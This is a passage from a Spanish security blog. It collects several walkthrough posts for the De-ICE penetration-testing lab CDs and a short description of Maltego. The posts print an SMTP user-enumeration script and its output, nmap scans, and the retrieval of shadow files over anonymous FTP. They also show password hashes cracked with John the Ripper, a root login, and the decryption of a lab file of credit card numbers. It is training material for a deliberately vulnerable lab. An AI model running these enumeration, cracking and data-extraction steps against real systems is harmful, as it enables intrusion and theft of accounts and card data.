Estella Havisham – havisham@herot.net
Abel Magwitch – magwitch@herot.net
Philip Pirrip – pirrip@herot.net

Testing:
Nicholas Nickleby – nickleby@herot.net
Ralph Nickleby – rnickleby@herot.net
Newman Noggs – noggs@herot.net
Wackford Squeers – squeers@herot.net
Thomas Pinch – pinch@herot.net
Mark Tapley – tapley@herot.net
Sarah Gamp – gamp@herot.net

Marketing:
Jacob Marley – marley@herot.net
Ebenezer Scrooge – scrooge@herot.net
Bob Cratchit – cratchit@herot.net

Human Resources:
Bill Sikes – sikes@herot.net
Jack Dawkins – dawkins@herot.net
Noah Claypole – claypole@herot.net

Posiblemente estos sean usuarios válidos en el sistema y pueda realizarse un inicio de sesión en alguno de los servicios disponibles en el sistema.

Ahora exploremos el host 192.168.2.101.

En este nos encontramos una serie de políticas de uso/configuración de aplicaciones/actividades relacionadas con la administración y la seguridad del servidor.

Software Installation Policy
Server Malware Protection Policy
Employee Internet Use Monitoring and Filtering Policy”
Acceptable Use Policy
Audit Vulnerability Scan Policy
Email Policy

Tratemos entonces de autenticarnos en alguno de los servicios disponibles haciendo uso del listado de posibles usuarios con passwords comunes/blanco/mismo-nombre-usuario.

Primero depuremos el listado de posibles usuarios:

pickwick
winkle
snodgrass
tupman
weller
tweller
havisham
magwitch
pirrip
nickleby
rnickleby
noggs
squeers
pinch
tapley
gamp
marley
scrooge
cratchit
sikes
dawkins
claypole

Ahora identifiquemos y verfiquemos los usuarios reales del sistema.

Para esta actividad aplicaremos una técnica mostrada en un entorno anterior, pero ahora perfeccionada por Roguer (jollyroguer [at] gmail [dot] com) quien ha desarrollado un script en python que automatizará esa consulta. Veamos:

#usensmtp.py

######usensmtp.py######
import getpass
import sys
import telnetlib

print “Welcome to usensmtp.py”
print “Created by Roguer”
host = raw_input(“Digite la ip del objetivo: “)
port = raw_input(“Digite el puerto del objetivo: “)
users_file = raw_input(“Digite el nombre del diccionario de usuarios: “)
tn = telnetlib.Telnet(host,port)
tn.write(“helo x” + “\n”)
tn.write(“mail from: roguer@slax.example.net” + “\n”)

#este valor puede cambiar para otros entornos
print tn.read_until(“Sender ok”,1)
inp = open(users_file,”r”)
for linea in inp.readlines():
tn.write(“rcpt to: “+ linea)
print tn.read_until(“User unknown”,0.1)
inp.close()
tn.write(“quit” + “\n”)
print “created by Roguer”
print “jollyroguer@gmail.com”
#### fin####

También podemos utilizar la herramienta smtp-user-enum que había mostrado en el primer entorno para los propósitos de enumeración de usuarios.

Los resultados arrojados por el script de Roguer son los siguientes:

root@bt: ~#python usensmtp.py
Welcome to usensmtp.py
Created by Roguer
Digite la ip del objetivo: 192.168.2.100
Digite el puerto del objetivo: 25
Digite el nombre del diccionario de usuarios: usuarios.txt
220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Thu, 4 Mar 2010
08:07:24 GMT
250 slax.example.net Hello [192.168.2.10], pleased to meet you
250 2.1.0 roguer@slax.example.net… Sender ok
250 2.1.5 root… Recipient ok
550 5.1.1 pickwick… User unknown
550 5.1.1 winkle… User unknown
550 5.1.1 snodgrass… User unknown
550 5.1.1 tupman… User unknown
550 5.1.1 weller… User unknown
550 5.1.1 tweller… User unknown
250 2.1.5 havisham… Recipient ok
250 2.1.5 magwitch… Recipient ok
250 2.1.5 pirrip… Recipient ok
550 5.1.1 nickleby… User unknown
550 5.1.1 rnickleby… User unknown
550 5.1.1 noggs… User unknown
550 5.1.1 squeers… User unknown
550 5.1.1 pinch… User unknown
550 5.1.1 tapley… User unknown
550 5.1.1 gamp… User unknown
550 5.1.1 marley… User unknown
550 5.1.1 scrooge… User unknown
550 5.1.1 cratchit… User unknown
550 5.1.1 sikes… User unknown
550 5.1.1 dawkins… User unknown
550 5.1.1 claypole… User unknown
550 5.1.1 spickwick… User unknown
550 5.1.1 nwinkle… User unknown
550 5.1.1 asnodgrass… User unknown
550 5.1.1 ttupman… User unknown
550 5.1.1 sweller… User unknown
550 5.1.1 tweller… User unknown
550 5.1.1 ehavisham… User unknown
550 5.1.1 amagwitch… User unknown
550 5.1.1 ppirrip… User unknown
550 5.1.1 nnickleby… User unknown
550 5.1.1 rnickleby… User unknown
550 5.1.1 nnoggs… User unknown
550 5.1.1 wsqueers… User unknown
550 5.1.1 tpinch… User unknown
550 5.1.1 mtapley… User unknown
550 5.1.1 sgamp… User unknown
550 5.1.1 jmarley… User unknown
550 5.1.1 escrooge… User unknown
550 5.1.1 bcratchit… User unknown
550 5.1.1 bsikes… User unknown
550 5.1.1 jdawkins… User unknown
550 5.1.1 nclaypole… User unknown
550 5.1.1 samuel… User unknown
550 5.1.1 nathaniel… User unknown
550 5.1.1 augustus… User unknown
550 5.1.1 tracy… User unknown
550 5.1.1 sam… User unknown
550 5.1.1 tony… User unknown
550 5.1.1 estella… User unknown
550 5.1.1 abel… User unknown
550 5.1.1 philip… User unknown
550 5.1.1 nicholas… User unknown
550 5.1.1 ralph… User unknown
550 5.1.1 newman… User unknown
550 5.1.1 wackford… User unknown
550 5.1.1 thomas… User unknown
550 5.1.1 mark… User unknown
550 5.1.1 sarah… User unknown
550 5.1.1 jacob… User unknown
550 5.1.1 ebenezer… User unknown
550 5.1.1 bob… User unknown
550 5.1.1 bill… User unknown
550 5.1.1 jack… User unknown
550 5.1.1 noah… User unknown
550 5.1.1 samuelp… User unknown
550 5.1.1 nathanielw… User unknown
550 5.1.1 augustuss… User unknown
550 5.1.1 tracyt… User unknown
550 5.1.1 samw… User unknown
550 5.1.1 tonyw… User unknown
550 5.1.1 estellah… User unknown
550 5.1.1 abelm… User unknown
550 5.1.1 philipp… User unknown
550 5.1.1 nicholasn… User unknown
550 5.1.1 ralphn… User unknown
550 5.1.1 newmann… User unknown
550 5.1.1 wackfords… User unknown
550 5.1.1 thomasp… User unknown
550 5.1.1 markt… User unknown
550 5.1.1 sarahg… User unknown
550 5.1.1 jacobm… User unknown
550 5.1.1 ebenezers… User unknown
550 5.1.1 bobc… User unknown
550 5.1.1 bills… User unknown
550 5.1.1 jackd… User unknown
created by Roguer
jollyroguer @ gmail.com

Para quienes represente algún inconveniente ejecutar el script en python, también existe otra herramienta escrita en C que me ha resultado bastante efectiva a la hora de realizar enumeración de usuarios a través del servicio SMTP con RCPT. Veamos:

SMTP (RCPT TO) User enumeration

Una ves descargado/copiado como rcpt2.c (foo.c) y editado el código según nuestras necesidades, procedemos a compilarlo para generar el binario.

Edición:

Solo necesité editar las siguientes lineas (negrita):

define PORT            25
#define BUFFSIZE        2048
#define NAME            “rcpt2″
#define HELO            “HELO Sec-Track\n”
#define MAIL            “mail from:\n”
#define RCPT2           “rcpt to: “

Compilación:

root@bt:~# gcc rcpt2.c -o user_enumeration

Ejecución:

root@bt:~# ./user_enumeration
rcpt2 by B-r00t. (c) 2003.
Usage: ./user_enumeration
./user_enumeration usernames.txt smtp.acme.com

Resultados:

root@bt:~# ./user_enumeration users.txt 192.168.2.100
rcpt2 by B-r00t. (c) 2003.
Usernames from: users.txt
RCPT TO username enumeration on 192.168.2.100.

BANNER: 220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Fri, 12 Mar 2010 11:35:30 GMT
SEND: HELO avatar
RECV: 250 slax.example.net Hello [192.168.2.1], pleased to meet you
2010 11:35:30 GMT

SENT: mail from:
RECV: 250 2.1.0 … Sender ok

VALID_USER: root
VALID_USER: havisham
VALID_USER: magwitch
VALID_USER: pirrip

Sending RSET & QUIT to 192.168.2.100

Ok Done!

Como se puede ver logramos obtener algunos de los usuarios del sistema. Estos son:

root
havisham
magwitch
pirrip

En el próximo post evaluaremos la posibilidad de autenticarnos con estos usuarios en los servicios disponibles (brute force, contraseñas débiles, etc). También trataremos de identificar vulnerabilidades en el sistema que nos permitan determinar posibles puntos de intrusión.

Desarrollo del entorno De-Ice III – Network Mapping, Port Scanning

S3cTr4ck — Thu, 11 Mar 2010 08:48:34 +0000

Antes de comenzar con el desarrollo de este entorno virtualizado de intrusión creo que es necesario recordar sobre algunos de los objetivos generales en esta primera serie de entornos enfocados a los Test de Penetración.

Objetivos Generales para los entornos De-Ice I, II, III y PwnOS

También es necesario describir nuevamente el escenario propuesto para este Test de Penetración:

De-ICE PenTest LiveCDs (Nivel III)

El procedimiento de implementación de este entorno no varía mucho con respecto a los anteriores. Tan solo cambia la red objetivo, que para esta ocasión será la 192.168.2.*

Identifiquemos los host vivos (conectados) en la red (Tool: Netdiscover incluída en BackTrack):

root@bt:~# netdiscover eth0

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 192.168.2.1     00:50:56:c0:00:07    01    060   Unknown vendor
 192.168.2.100   00:0c:29:0c:b9:e5    01    060   Unknown vendor
 192.168.2.101   00:0c:29:0c:b9:e5    01    060   Unknown vendor
 Currently scanning: 192.168.9.0/16   |   Our Mac is: 00:0c:29:ac:c4:e0 - 0

Una vez hemos identificados los posibles host’s objetivos pasemos a escanearlos en detalle para obtener más información sobre estos.

Veamos este proceso con Nmap.

Escaneo y explicación enviada por Roguer (jollyroguer [at] gmail.com):

root@bt: ~#nmap -sP 192.168.2.1-255
Starting Nmap 5.00 ( http://nmap.org ) at 2010-02-25 23:35 UTC
Host 192.168.2.10 is up.
Host 192.168.2.100 is up (0.00066s latency).
MAC Address: 00:0C:29:78:57:AE (VMware)
Host 192.168.2.101 is up (0.00066s latency).
MAC Address: 00:0C:29:78:57:AE (VMware)
Nmap done: 255 IP addresses (3 hosts up) scanned in 2.06 seconds

En donde obtengo que hay 3 equipos arriba, de los cuales el .10 es mi máquina y los 100 y 101 objetivos enseguida nos centraremos en el equipo .100

Arranco haciendo un escaneo de puertos, como es un entorno seguro no hay necesidad de ocultar la ip de origen

root@bt: ~#nmap -sV -T Aggressive -O 192.168.2.100
Starting Nmap 5.00 ( http://nmap.org ) at 2010-02-25 23:36 UTC
Interesting ports on 192.168.2.100:
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
25/tcp open smtp Sendmail 8.13.7/8.13.7
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
443/tcp closed https
MAC Address: 00:0C:29:78:57:AE (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.13 – 2.6.24
Network Distance: 1 hop
Service Info: Host: slax.example.net; OS: Unix
OS and Service detection performed. Please report any incorrect
results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds

Como podemos ver hay varios servicios corriendo en este equipo, así que vamos a tratar de obternet información como en los entornos anteriores.

——————————————————————————————–

Realicemos un escaneo para identificar servicios y versiones en el host 192.168.2.101

root@bt:~# nmap -PT80 192.168.2.101

Starting Nmap 5.00 ( http://nmap.org ) at 2010-03-02 13:09 COT
Interesting ports on 192.168.2.101:
Not shown: 999 filtered ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:0C:B9:E5 (VMware)

root@bt:~# nmap -sV -p 80 192.168.2.101

Starting Nmap 5.00 ( http://nmap.org ) at 2010-03-02 13:12 COT
Interesting ports on 192.168.2.101:
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
MAC Address: 00:0C:29:0C:B9:E5 (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.28 seconds

Perfecto el proceso de mapeo de red e identificación de aplicaciones y servicios en los host objetivos. En el próximo post centraremos nuestra atención a las actvidades relacionadas con la enumeración del objetivo e identificación de posibles puntos de intrusión.

Desarrollo del Entorno De-Ice nivel II – Información Confidencial y Backdoors

S3cTr4ck — Mon, 22 Feb 2010 21:37:44 +0000

Ahora que tenemos acceso al sistema como usuarios privilegiados, procedemos a recolectar y extraer la información confidencial que exista en el sistema.

Nos logueamos en el sistema:

login as: bbanter
bbanter@192.168.1.110’s password:
Linux 2.6.16.
bbanter@slax:~$ su
Password: **********
root@slax:/home/bbanter#

Exploremos los diferentes directorios en busca de información confidencial

root@slax:/home/aadams# ls -la
total 4
drwxr-xr-x 2 aadams users   80 Mar 15 2007 .
drwxr-xr-x 8 root   root   140 Mar 15 2007 ..
-rw-r–r– 1 aadams users 3729 Feb 4 2007 .screenrc
root@slax:/home/aadams# ls /home/bbanter/ -la
total 4
drwxr-xr-x 2 bbanter users   80 Mar 15 2007 .
drwxr-xr-x 8 root    root   140 Mar 15 2007 ..
-rw-r–r– 1 bbanter users 3729 Feb 4 2007 .screenrc
root@slax:/home/aadams# ls /home/ccoffee/ -la
total 4
drwxr-xr-x 2 ccoffee users   80 Mar 15 2007 .
drwxr-xr-x 8 root    root   140 Mar 15 2007 ..
-rw-r–r– 1 ccoffee users 3729 Feb 4 2007 .screenrc
root@slax:/home/aadams# ls /home/ftp/ -la
total 0
drwxr-xr-x 4 root   root 80 Mar 15 2007 .
drwxr-xr-x 8 root   root 140 Mar 15 2007 ..
drwxr-xr-x 7 aadams 513 160 Mar 15 2007 download
drwxrwxrwx 2 root   root 60 Feb 26 2007 incoming
root@slax:/home/aadams# ls /home/root/ -la
total 4
drwxr-xr-x 3 aadams 513 100 Mar 15 2007 .
drwxr-xr-x 8 root   root 140 Mar 15 2007 ..
drwx—— 2 root   root 100 Mar 15 2007 .save
-rw-r–r– 1 aadams 513 3729 Feb 27 2007 .screenrc

Nos encontramos con dos archivos de interés:

root@slax:/home/aadams# cd ..
root@slax:/home# cd root/.save/
root@slax:/home/root/.save# ls -la
total 8
drwx—— 2 root root 100 Mar 15 2007 .
drwxr-xr-x 3 aadams 513 100 Mar 15 2007 ..
-r-x—— 1 root root 198 Mar 13 2007 copy.sh
-rw-r–r– 1 aadams 513 560 Mar 13 2007 customer_account.csv.enc

Exploremos el contenido de estos:

COPY.SH

root@slax:/home/root/.save# cat copy.sh
#!/bin/sh
#encrypt files in ftp/incoming
openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw
#remove old file
rm /home/ftp/incoming/$1

Este archivo parecía ser utilizado para cifrar los archivos contenidos en el directorio incoming del FTP con cifrado aes-256-cbc luego realiza una copia del archivo cifrado al directorio /home/root/.save haciendo uso de los certificados en /etc/ssl/certs/pw y eliminando copias anteriores.

Por lo tanto por este mismo medio podemos descifrar el contenido de este archivo…

root@slax:/home/root/.save# openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out clientes.csv -pass file:/etc/ssl/certs/pw
root@slax:/home/root/.save# ls
clientes.csv copy.sh customer_account.csv.enc

Visualicemos el archivo:

root@slax:/home/root/.save# cat clientes.csv
“CustomerID”,”CustomerName”,”CCType”,”AccountNo”,”ExpDate”,”DelMethod”
1002,”Mozart Exercise Balls Corp.”,”VISA”,”2412225132153211″,”11/09″,”SHIP”
1003,”Brahms 4-Hands Pianos”,”MC”,”3513151542522415″,”07/08″,”SHIP”
1004,”Strauss Blue River Drinks”,”MC”,”2514351522413214″,”02/08″,”PICKUP”
1005,”Beethoven Hearing-Aid Corp.”,”VISA”,”5126391235199246″,”09/09″,”SHIP”
1006,”Mendelssohn Wedding Dresses”,”MC”,”6147032541326464″,”01/10″,”PICKUP”
1007,”Tchaikovsky Nut Importer and Supplies”,”VISA”,”4123214145321524″,”05/08″,”SHIP”

Hemos obtenido acceso a las tarjetas de crédito de los clientes de dicho sistema objetivo…

Veamos ahora como podemos implementar un backdoor en el sistema:

Tema ya tratado en el anterior entorno

Desarrollo del Entorno De-Ice nivel II – Acceso al Sistema y Elevación de Privilegios

S3cTr4ck — Fri, 19 Feb 2010 03:34:21 +0000

Una vez hemos conseguido ingresar al sistema por medio del servidor FTP con acceso anónimo trataremos de elevar u obtener información sensible que nos permita cumplir con nuestro objetivo como PenTesters.

Ingresemos entonces al sistema, exploremos y recolectemos información.

root@bt:~/De-Ice_II# ftp 192.168.1.110
Connected to 192.168.1.110.
220 (vsFTPd 2.0.4)
Name (192.168.1.110:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

————

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 7 1000 513 160 Mar 15 2007 download
drwxrwxrwx 2 0 0 60 Feb 26 2007 incoming
226 Directory send OK.

———–

Exploremos lo que parece ser el directorio de descargas de copias de seguridad o migraciones descrito en el escenario del entorno.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    6 1000     513           340 Mar 15 2007 etc
drwxr-xr-x    4 1000     513           100 Mar 15 2007 opt
drwxr-xr-x   10 1000     513           400 Mar 15 2007 root
drwxr-xr-x    5 1000     513           120 Mar 15 2007 usr
drwxr-xr-x    3 1000     513            80 Mar 15 2007 var
226 Directory send OK.

Acá debemos explorar en detalle el contenido de cada uno de estos directorios con la finalidad de encontrar información relevante que permita elevar privilegios en el sistema. Cada persona será libre de elegir el directorio por el cual comenzar, pero recomiendo hacerlo con los directorios que revelan más información del sistema. Para este caso el directorio /etc.

ftp> cd etc
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    4 1000     513           160 Mar 15 2007 X11
-rw-r–r–    1 1000     513        362436 Mar 03 2007 core
drwxr-xr-x    2 1000     513           100 Mar 15 2007 fonts
-rw-r–r–    1 1000     513           780 Apr 30 2005 hosts
-rw-r–r–    1 1000     513           718 Jul 03 2005 inputrc
-rw-r–r–    1 1000     513          1296 Jun 10 2006 issue
-rw-r–r–    1 1000     513           183 Jun 23 2005 lisarc
-rw-r–r–    1 1000     513            56 Oct 21 2004 localtime
lrwxrwxrwx    1 1000     513            23 Feb 18 06:16 localtime-copied-from -> /usr/share/zoneinfo/GMT
-rw-r–r–    1 1000     513         10289 Dec 31 2003 login.defs
-rw-r–r–    1 1000     513             1 Dec 31 2003 motd-slax
drwxr-xr-x    2 1000     513           100 Mar 15 2007 profile.d
drwxr-xr-x    2 1000     513           220 Mar 15 2007 rc.d
-rw-r–r–    1 1000     513           440 Jul 18 2006 shadow
226 Directory send OK.

Recomiendo además ir realizando la descarga de los archivos y directorios que consideremos de interés para el Test de Penetración. Para ello basta ejecutar la siguiente instrucción:

get name_file

En este caso quedaría así:

ftp> get shadow
local: shadow remote: shadow
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for shadow (440 bytes).
226 File send OK.
440 bytes received in 0.00 secs (1761.0 kB/s)

Una vez descargados y analizados los archivos procedemos a utilizar los resultados obtenidos en dicho análisis.

Entre los archivos descargados y analizados podemos encontrar varios de mucho interés que deben ser tenidos en cuenta.

Uno de ellos es el archivo shadow almacenado en el directorio /etc

root@bt:~/De-Ice_II# cat shadow
root:$1$3OF/pWTC$lvhdyl86pAEQcrvepWqpu.:12859:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::

Podríamos intentar un ataque de fuerza bruta para descifrar la contraseña de root, pero si observamos en detalle el mismo, podemos deducir que este no corresponde al sistema objetivo, pues no presenta los posibles usuarios administradores del sistema identificados en la primera fase del Test de Penetración.

Contact information for admins is as follows:
Sr. System Admin: Adam Adams – adamsa@herot.net
System Admin (Intern): Bob Banter – banterb@herot.net
System Admin: Chad Coffee – coffeec@herot.net

De otro lado fue decisivo encontrar un archivo conocido como CORE

root@bt:~/De-Ice_II# ls
core rc.FireWall rc.S rc.inet1 rc.slaxconfig shadow
rc.6 rc.M rc.gpm rc.slax root

Los archivos core son generados (volcados de memoria) a raiz de fallos o crash del sistema. Estos contienen información referente al estado de memoría y del sistema, además de contener información relacionada al aplicativo que generó dicho crash. (Más información>>)

Veamos los strings de dicho archivo:

… (Final del archivo core)

root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::

adm:*:9797:0:::::
lp:*:9797:0:::::

sync:*:9797:0:::::

shutdown:*:9797:0:::::

halt:*:9797:0:::::

mail:*:9797:0:::::

news:*:9797:0:::::

uucp:*:9797:0:::::

operator:*:9797:0:::::

games:*:9797:0:::::

ftp:*:9797:0:::::

smmsp:*:9797:0:::::

mysql:*:9797:0:::::

rpc:*:9797:0:::::

sshd:*:9797:0:::::

gdm:*:9797:0:::::

pop:*:9797:0:::::

nobody:*:9797:0:::::

aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::

bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::

ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

Una vez identificados los usuarios válidos del sistema procedamos a descifrar sus contraseñas.

Hagamos uso de john the ripper

root@bt:~/Sec-Track/info/john-1.7.4.2/run# ./john
John the Ripper password cracker, version 1.7.4.2
Copyright (c) 1996-2010 by Solar Designer and others
Homepage: http://www.openwall.com/john/

Usage: john [OPTIONS] [PASSWORD-FILES]
–single                   “single crack” mode
–wordlist=FILE –stdin    wordlist mode, read words from FILE or stdin
–rules                    enable word mangling rules for wordlist mode
–incremental[=MODE]       “incremental” mode [using section MODE]
–external=MODE            external mode or word filter
–stdout[=LENGTH]          just output candidate passwords [cut at LENGTH]
–restore[=NAME]           restore an interrupted session [called NAME]
–session=NAME             give a new session the NAME
–status[=NAME]            print status of a session [called NAME]
–make-charset=FILE        make a charset, FILE will be overwritten
–show                     show cracked passwords
–test[=TIME]              run tests and benchmarks for TIME seconds each
–users=[-]LOGIN|UID[,..] [do not] load this (these) user(s) only
–groups=[-]GID[,..]       load users [not] of this (these) group(s) only
–shells=[-]SHELL[,..]     load users with[out] this (these) shell(s) only
–salts=[-]COUNT           load salts with[out] at least COUNT passwords only
–format=NAME              force hash type NAME: DES/BSDI/MD5/BF/AFS/LM
–save-memory=LEVEL        enable memory saving, at LEVEL 1..3

Comenzaré utilizando el diccionario básico que incluye el mismo john the ripper, según los resultados obtenidos aumentaré la complejidad de los diccionarios.

…

Con diccionarios básicos no he tenido buenos resultados… Por ello utilicé un diccionario más complejo que me va arrojando los siguientes resultados:

C:\Users\4v4t4r\Downloads\john171w\john1701\run>john-386.exe users.txt –wordlist=dic.lst

Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])
guesses: 0 time: 0:00:00:33 1% c/s: 5559 trying: Jagdgesetze
guesses: 0 time: 0:00:00:54 1% c/s: 5561 trying: Unberechenbarke
guesses: 0 time: 0:00:01:36 3% c/s: 5508 trying: pingelige
guesses: 0 time: 0:00:02:38 5% c/s: 5528 trying: de’mante`lerai
guesses: 0 time: 0:00:03:27 6% c/s: 5534 trying: radioreportages
guesses: 0 time: 0:00:06:14 10% c/s: 5528 trying: seccature
guesses: 0 time: 0:00:07:06 12% c/s: 5527 trying: ik{iseni
guesses: 0 time: 0:00:13:50 25% c/s: 5502 trying: cvakaly
guesses: 0 time: 0:00:14:21 26% c/s: 5503 trying: nejnevycvicenej
guesses: 0 time: 0:00:19:14 33% c/s: 5483 trying: myjv
guesses: 0 time: 0:00:21:18 36% c/s: 5483 trying: villaje
Complexity (root)
guesses: 1 time: 0:00:21:39 37% c/s: 5483 trying: Beintema
guesses: 1 time: 0:00:24:09 42% c/s: 5474 trying: walesa

Encontrado el password de root (Y) de todas maneras la dejo seguir, con el objetivo de descifrar los demás passwords.

Finalmente y luego de 40 minutos obtuvimos lo siguiente:

C:\Users\4v4t4r\Downloads\john171w\john1701\run>john-386.exe users.txt –wordlis
t=dic.lst
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])
guesses: 0 time: 0:00:00:33 1% c/s: 5559 trying: Jagdgesetze
guesses: 0 time: 0:00:00:54 1% c/s: 5561 trying: Unberechenbarke
guesses: 0 time: 0:00:01:36 3% c/s: 5508 trying: pingelige
guesses: 0 time: 0:00:02:38 5% c/s: 5528 trying: de’mante`lerai
guesses: 0 time: 0:00:03:27 6% c/s: 5534 trying: radioreportages
guesses: 0 time: 0:00:06:14 10% c/s: 5528 trying: seccature
guesses: 0 time: 0:00:07:06 12% c/s: 5527 trying: ik{iseni
guesses: 0 time: 0:00:13:50 25% c/s: 5502 trying: cvakaly
guesses: 0 time: 0:00:14:21 26% c/s: 5503 trying: nejnevycvicenej
guesses: 0 time: 0:00:19:14 33% c/s: 5483 trying: myjv
guesses: 0 time: 0:00:21:18 36% c/s: 5483 trying: villaje
Complexity (root)
guesses: 1 time: 0:00:21:39 37% c/s: 5483 trying: Beintema
guesses: 1 time: 0:00:24:09 42% c/s: 5474 trying: walesa
Zymurgy (bbanter)
guesses: 2 time: 0:00:35:35 76% c/s: 5446 trying: Nachkriegspolit
guesses: 2 time: 0:00:38:15 85% c/s: 5444 trying: ritornato
guesses: 2 time: 0:00:39:13 88% c/s: 5442 trying: skrigen
guesses: 2 time: 0:00:41:43 97% c/s: 5448 trying: vozidlech
guesses: 2 time: 0:00:42:30 100% c/s: 5449 trying: ovrigt

Confirmemos entonces el acceso al sistema con los usuarios encontrados:

login as: root
root@192.168.1.110′s password:
Access denied
root@192.168.1.110′s password:

Acceso denegado para login remoto como root en el sistema… Probemos entonces a iniciar con bbanter y elevar privilegios como root (su):

login as: bbanter
bbanter@192.168.1.110′s password:
Linux 2.6.16.
bbanter@slax:~$ su
Password: **********
root@slax:/home/bbanter#

Hemos conseguido ingresar al sistema con todos los privilegios… En el próximo post exploraremos el sistema en busca de información confidencial que comprometa la seguridad de la empresa objetivo…

Tool: Maltego, Herramienta de Inteligencia, Análisis Forense y Recolección de Información

S3cTr4ck — Wed, 10 Feb 2010 11:17:44 +0000

La herramienta Maltego (desarrollada por Paterva) es una herramienta que permite realizar recolecciones de información en Internet así como la representación de la misma en formatos fáciles de interpretar.

Maltego hace uso de varias librerías gráficas que permiten identificar las relaciones entre la información que se está consultando en los diferentes motores de búsqueda que implementa, permitiendo de esta manera organizar todo un mapa de relaciones entre resultados.

Maltego puede ser descargada de manera gratuita (Community Edition) para sistemas Windows y Linux, además ofrece una versión comercial, (Comercial Edition) la cual entre otras bondades, permite realizar búsquedas aun más profundas y exportar y/o salvar los resultados obtenidos.

Maltego viene incluía en BackTrack y nos permitirá entonces enumerar la información referente a redes, dominios, personas, emails y datos personales. Algunos de estos datos son:

Nombres de dominio
Información WHOIS
Nombres DNS
Bloques de red
Direcciones IP
Dirección de correo electrónico asociada con un nombre de persona
Sitios web asociados con un nombre de persona
Números telefónicos asociados con un nombre de persona
Grupos sociales que están asociados con un nombre de persona
Compañías y organizaciones asociadas con un nombre de persona
Hacer una verificación simple de las direcciones de correo electrónico
Búsqueda de blogs y referencias por frases
Identificar vínculos entrantes para sitios web
Extraer metadatos desde archivos y fuentes de dominios

Veamos un ejemplo de consulta a la web del proyecto Sec-Track:

En la imagen se puede observar como realicé una consulta por el sitio Web Sec-Track, a partir de allí obtenemos datos como el dominio de la web, la dirección IP, Correos electrónicos publicados, enlaces, etc…

Para más información y descarga de la herramienta, visita la página oficial del proyecto Maltego.

Pronto seguiré con varios post relacionados al uso específico de esta genial herramienta.